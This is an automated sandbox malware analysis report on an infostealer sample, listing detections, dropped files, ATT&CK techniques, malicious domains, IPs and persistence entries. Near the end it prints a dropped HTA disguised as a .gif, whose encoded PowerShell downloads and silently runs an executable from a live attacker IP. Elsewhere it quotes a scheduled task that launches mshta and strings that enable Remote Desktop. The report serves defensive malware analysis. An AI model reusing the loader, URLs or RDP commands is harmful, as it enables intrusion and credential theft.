Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZNWzk16[1].exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1032672001\VDoTjfk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VDoTjfk[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1032624001\tbd0KQd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tbd0KQd[1].exe, type: DROPPED

Contains functionality to start a terminal service

Source: artVssK[1].exe.6.dr	String found in binary or memory: net start termservice
Source: artVssK[1].exe.6.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set9150b4e4def0d47d5c08e57610a64f14dfe31c22fa0c20aed83595c1f177d7792e723532d3faff7a7dbd73a8989897fde12089KJaQMcIVPC9nPwMxIV6=JTvBVQ3fUHW QL5s6oGiiw1r1wA=LIYmN ==SoUacAYmHIVheJ==JIPheJ==WSOPPzUU2n07Qp==PTbPeQZmOq0T2J==SQ3vWyhuXo02WPhm7oYwfWVVNudk5rHobTH2RWZrfq0jgyVo7pCmfW18KcVpM7VcXG==SQ3vWyhuXo02WPhm7oYwfWVVNudk5rHobTH2RWZrfq0jgyVo7pCmfW18HMhr5LZrXND2WQRefmGIdzRv6EqDfWtfPMJuSTL7dgVUfE==ScPiWSV JvcwLJOCUxhVCEYwPXAbSQ3vWyhuXo02WPhm7oYwfWVVNudk5rHobTH2RWZrfq0jgyVo7pCmfW18KcVpadPj0zBlPDN6SxDk0WNae1R=SQ3vWyhuXo02WPhm7oYwfWVVNudk5rHobTH2RWZrfq0jgyVo7pCmfW18HMhr5LZrXND2VVleeKB6Uf5vTIKvgq==HLPISONJXodvVNtIDS==Vuzldt==Su3IWt==PQPJ9MKVbdGVaSKV TGVWceVWNCVawGVbMYVXwUVWNSV xSV S7Va U=WTDa0v9deKCX1Vts7EUhfAt3WTDa0v9deKB=WSredv9deKB=Xty=XJy=XJC=XJG=RMzec ==9xLPdwsoOA==9xLPdAQZOCc=XNbaXwrhWSV axGm NHeccflJTzQbPZTNwG+NwK+JRvhePhierRkIomgGm==dq==HdPjbQU2NG==aSbaczAsPm ezs=9SPncfZlPDNj2ztvPSPPUfJTd14aXWhC8IKqWQ1h2l==SxDk0WNaeYW7gzBfOLTqVUU X6dbgA k7oJ=ONTedfI=QSzodzZrf6yULxtkSi==PLHuWt==Swzj0zI X609gQFs8J =Pw39ezcrLJia1 ==OLTwKpSlWzcT10CI2PJ47oaXiK==OcfP0zZf20 2QE=Rc3nezcnSS3lbzcsOS3icVVoTSfjSzZf20 2QE=KtynNsUUQnhTRJ==acC=bSC=OS3jezZngG6JhQxoIkqqhQtV1MBc6sGoXc3ncL5d11W7Rrxl65Kr3ABt5I0oEXQmJIUiML4mBGjscV9T20 PONNs75qsgWhV1L9pHnrf TDiMPVagKJWLz1k6YJ6MgNc4vEdHDrf9MracfJm2X58G7UzRVcngK0jgvXX9ZqiScxc3wBn41Dabwfkcbco17WagvXC8Jyi2QWIs60FBGiiML4mOW5=JIUCD ==NTH9dc4qJcjl0p==OS3jezZngG6JhQxoIkqegBxn1LNc7Lbo 93TMQhWgC6beWFwFZKvfARpOR9fS1G=SRfIWxZG0ISQfgFo6pGAfW1V3b9nN7LTVuHkcgVre6C2TV5w7JKX3RFJOL1gQJDo NvQezZrWqKi2J==OS3idAZT21OD1PXoWMD90zZf26medfpv6YUsgBBt3SRW7s4XcNilNMMsQHZRQsc8FXX=JNPjbPRo2KZiSRfIWxZG0ISQfgFo6pGAfW1V3b9nN7LTVuHkcgVre6C2YP1s8IKhZghfPL98J5ZHTvDEUyBPVYWuWUs=SRfIWxZG0ISkegNB64mQ3RMrCsF8N7Lrbcf90QR6TqKodPJH5ZCtfAB0NuZkSLLoTcf 0PcCUE==VtulNwE=PwPbZQZlgJSagANs6o3wPfdNPMNq5MLT9M3jPwPbZQZlgJSagANs6o3wPfhNPMNq5MLT9M3jSQ3vWyhuXo02WPhm7oYwfWVVNudk5rHobTG6UeV6T70nffRx8HOighJk2R4=SxDk0AZcgI 7ePQ=K umPJ==K unN ==K umO ==K unOJ==OTPndfZngIOQdPtnVq==M iVadPj0zBlPDNj2QdoJSm6GdL7dVxkd0ChLv5pCEYmfMwdG9ubKbFTd06aeWR3CFtdNcUbPvVnBF==H9S6SQligGN=G9ubKbFr2096GsSbJt==Sw3S0QNsdK0hev1o9IJ=JMPT0PRUgKqkegxy6IagiMxtPL1q7LLs9M8j0PU OY4eezQjCi==G7==aSbQezVog696OQIjFZFdQu==aTKYdp==aczj0zcmQSPUZfcafqV6WzB865KX1zxtPLxqR1G=KtulNwETPXp=KtulNwETPnN=KtulNwETPnR=KtulNwETP63=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	1 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	OS Credential Dumping	1 System Time Discovery	1 Remote Desktop Protocol	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	12 Process Injection	3 Obfuscated Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Email Collection	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Scheduled Task/Job	11 Scheduled Task/Job	23 Software Packing	Security Account Manager	227 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 Timestomp	NTDS	851 Security Software Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	261 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Mshta	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	61%	Virustotal		Browse
file.exe	58%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mQvinTe[1].exe	100%	Avira	HEUR/AGEN.1304598
C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1033552001\e14357a0aa.exe	100%	Avira	HEUR/AGEN.1304598
C:\Users\user\AppData\Local\Temp\1033224001\mQvinTe.exe	100%	Avira	HEUR/AGEN.1304598
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	HEUR/AGEN.1304598
C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\artVssK[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZNWzk16[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1032672001\VDoTjfk.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1032884001\D95Ju8g.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1032914001\ZNWzk16.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1032624001\tbd0KQd.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\D95Ju8g[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tbd0KQd[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1032645001\artVssK.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VDoTjfk[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1033551001\9a8f788f0d.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZNWzk16[1].exe	34%	ReversingLabs	Win32.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	39%	ReversingLabs	Win32.Infostealer.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\D95Ju8g[1].exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.Nekark
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Dd7mHw1[1].exe	22%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\artVssK[1].exe	55%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mQvinTe[1].exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1032622001\Dd7mHw1.exe	22%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1032645001\artVssK.exe	55%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1032884001\D95Ju8g.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.Nekark
C:\Users\user\AppData\Local\Temp\1032914001\ZNWzk16.exe	34%	ReversingLabs	Win32.Trojan.Jalapeno
C:\Users\user\AppData\Local\Temp\1033224001\mQvinTe.exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1033551001\9a8f788f0d.exe	39%	ReversingLabs	Win32.Infostealer.Jalapeno
C:\Users\user\AppData\Local\Temp\1033552001\e14357a0aa.exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	61%	ReversingLabs	Win32.Infostealer.Tinba

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	high
cureprouderio.click	172.67.132.7	true	true
undesirabkel.click	188.114.97.3	true	true
vanaheim.cn	176.53.146.188	true	false
sputnik-1985.com	104.21.96.1	true	true
cloudewahsj.shop	unknown	unknown	true
noisycuttej.shop	unknown	unknown	true
fluid-draw.sourceforge.io	unknown	unknown	false
nearycrepso.shop	unknown	unknown	true
rabidcowse.shop	unknown	unknown	true
wholersorie.shop	unknown	unknown	true
fancywaxxers.shop	unknown	unknown	false
framekgirus.shop	unknown	unknown	true
tirepublicerj.shop	unknown	unknown	true
abruptyopsn.shop	unknown	unknown	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
cureprouderio.click	true
rabidcowse.shop	true
wholersorie.shop	true
http://185.215.113.16/mine/random.exe	true
http://185.215.113.43/Zu7JuNko/index.php	true
cloudewahsj.shop	true
noisycuttej.shop	true
nearycrepso.shop	true
framekgirus.shop	true
tirepublicerj.shop	true
abruptyopsn.shop	true

URLs from Memory and Binaries

Name	Source	Malicious
http://nuget.org/NuGet.exe	powershell.exe, 00000020.00000002.2541318032.000001EC4F73F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2541318032.000001EC4F882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2624453025.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2719740796.000001ED10072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2719740796.000001ED101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.3100010498.000001DB98314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.3100010498.000001DB981D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.3216362888.000002072779F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.3216362888.0000020727893000.00000004.00000800.00020000.00000000.sdmp	false
http://crl.microI	powershell.exe, 00000022.00000002.2646143574.00000000072CC000.00000004.00000020.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000005B.00000002.2773479662.000002071790B000.00000004.00000800.00020000.00000000.sdmp	false
http://crl.microsoft	powershell.exe, 00000049.00000002.2657950479.000001DB862D4000.00000004.00000020.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000005B.00000002.2773479662.000002071790B000.00000004.00000800.00020000.00000000.sdmp	false
https://go.micro	powershell.exe, 00000020.00000002.2487525339.000001EC40301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2563057347.000001ED00C2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.2680228301.000001DB88D8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.2773479662.000002071830B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000069.00000002.2817717444.0000020500521000.00000004.00000800.00020000.00000000.sdmp	false
http://www.tgrmn.com/bru.htm	rsn.exe.6.dr	false
https://contoso.com/License	powershell.exe, 0000005B.00000002.3216362888.0000020727893000.00000004.00000800.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 0000005B.00000002.3216362888.0000020727893000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000026.00000003.2456609014.000002A56D4F3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.2456609014.000002A56D557000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16	powershell.exe, 00000022.00000002.2572108118.0000000004D86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2572108118.0000000004C1A000.00000004.00000800.00020000.00000000.sdmp	true
http://185.215.113.16/mine/random.exeX	powershell.exe, 00000069.00000002.2817717444.00000205004AE000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 0000005B.00000002.2773479662.000002071790B000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 00000026.00000003.2456609014.000002A56D4C2000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2	svchost.exe, 00000026.00000003.2456609014.000002A56D512000.00000004.00000800.00020000.00000000.sdmp	false
https://go.microsofy	powershell.exe, 0000005B.00000002.3236652495.000002072F845000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000026.00000003.2456609014.000002A56D512000.00000004.00000800.00020000.00000000.sdmp	false
https://aka.ms/pscore6lBfq	powershell.exe, 00000022.00000002.2572108118.00000000049F1000.00000004.00000800.00020000.00000000.sdmp	false
http://185.2	mshta.exe, 0000001E.00000003.2462160832.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000002.2468361846.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000003.2443813104.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp	true
https://contoso.com/	powershell.exe, 0000005B.00000002.3216362888.0000020727893000.00000004.00000800.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 00000020.00000002.2541318032.000001EC4F73F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2541318032.000001EC4F882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2624453025.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2719740796.000001ED10072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2719740796.000001ED101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.3100010498.000001DB98314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.3100010498.000001DB981D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.3216362888.0000020727893000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.3216362888.0000020727751000.00000004.00000800.00020000.00000000.sdmp	false
https://aka.ms/pscore68	powershell.exe, 00000020.00000002.2487525339.000001EC3F6D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3013201178.000001D3CF201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2563057347.000001ED00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.2680228301.000001DB88161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.2773479662.00000207176E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000069.00000002.2817717444.000002050004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000069.00000002.2817717444.000002050005E000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000020.00000002.2487525339.000001EC3F6D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2572108118.00000000049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3013201178.000001D3CF201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2563057347.000001ED00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000049.00000002.2680228301.000001DB88161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000005B.00000002.2773479662.00000207176E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000069.00000002.2817717444.0000020500103000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000026.00000003.2456609014.000002A56D512000.00000004.00000800.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585203
Start date and time:	2025-01-07 10:06:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	121
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@186/98@15/4
EGA Information:	Successful, ratio: 54.5%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 104.18.10.31, 104.18.11.31, 23.56.254.164, 20.190.160.17, 40.126.32.68, 20.190.160.20, 20.190.160.14, 40.126.32.133, 40.126.32.136, 20.190.160.22, 40.126.32.74, 20.42.73.29, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, prwebsecure.sourceforge.io.cdn.cloudflare.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target mshta.exe, PID 2412 because there are no executed function
Execution Graph export aborted for target mshta.exe, PID 3156 because there are no executed function
Execution Graph export aborted for target mshta.exe, PID 3964 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7432 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7484 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:08:01	API Interceptor	966682x Sleep call for process: skotes.exe modified
04:08:12	API Interceptor	170x Sleep call for process: powershell.exe modified
04:08:16	API Interceptor	2x Sleep call for process: svchost.exe modified
09:07:12	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
09:08:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 1759c0aff4.exe C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
09:08:15	Task Scheduler	Run new task: AutoRunHTA path: cmd.exe s>/c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" & start mshta "C:\Temp\\random.hta")
09:08:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run am_no.cmd C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd
09:08:27	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 1759c0aff4.exe C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
09:08:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run am_no.cmd C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd
09:09:19	Task Scheduler	Run new task: Gxtuum path: C:\Users\user\AppData\Local\Temp\ce48d5f5a7\Gxtuum.exe
09:09:26	Task Scheduler	Run new task: HpUpdate path: C:\Users\user\AppData\Roaming\clichannel_test\msn.exe
09:09:26	Task Scheduler	Run new task: watcherChrome_rcc_4 path: C:\Users\user\AppData\Roaming\clichannel_test\msn.exe
09:09:31	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Condition.vbs

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xd12ad7de, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42216327604205534
Encrypted:	false
SSDEEP:	1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
MD5:	ECDCD796C1B19BD690562067CDA28644
SHA1:	547EB522D5ED2E87D1936AAD44DDAD0A013CAA79
SHA-256:	31DFBBAFCFC0709218FAD83B6A7FDF0700F0B851D8C015E29F8A845CBA8F8207
SHA-512:	6E25083F3E689E114589F8FC4918EB5F1C6AA267B70C7F154BB599C6C2F3B67A3A11ABF832A484AC31ED817582969C8C8DC36F84A0080A1067A092F7D739E56B
Malicious:	false
Reputation:	unknown
Preview:	.*..... .......A.......X\...;...{......................0.!..........{A......}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................q........}...................d.......}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\Temp\.gif

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
SHA1:	163F952333EE8C68BEFE928CC05A435DF26F1D4B
SHA-256:	D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
SHA-512:	6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\.gif, Author: Joe Security
Reputation:	unknown
Preview:	<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..

C:\Temp\.hta (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	HTML document, ASCII text, with very long lines (601), with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	4.808412994473198
Encrypted:	false
SSDEEP:	24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
MD5:	B8B1EFFB8B550A10283923C32D0F4BDF
